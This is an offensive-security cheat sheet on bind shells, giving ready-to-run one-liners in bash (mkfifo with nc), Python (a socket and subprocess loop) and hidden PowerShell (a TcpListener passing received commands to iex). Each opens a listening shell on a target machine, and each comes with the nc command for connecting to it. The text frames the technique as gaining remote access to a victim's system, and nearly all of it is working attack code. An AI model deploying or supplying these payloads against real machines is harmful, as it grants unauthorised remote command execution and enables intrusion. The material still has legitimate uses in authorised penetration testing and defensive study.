Bind shell

A Bind Shell is a technique used to gain remote access to a victim's system by making it listen on a port and then connecting to that listener. The shell sent to listen is attached to the target's shell on the target system, letting us take control of the internal shell by connecting to it.

It is usually less effective than trying to get a Reverse Shell, as the hosts that use firewalls normally block incoming connections.

Basic script

• Use a script that establishes a listening port on the target machine

BindShell.sh

#!/bin/bash

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp $port >/tmp/f

• Connect to the listening port we have set using Netcat

nc $IP $port

Using Python

• Use this command to establish a listening port on the target machine with Python

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",$port));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

• Connect to the listening port we have set using Netcat

nc $IP $port

Using PowerShell

• Use this command to establish a listening port on a Windows target machine using PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]$port; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

• Connect to the listening port we have set using Netcat

nc $IP $port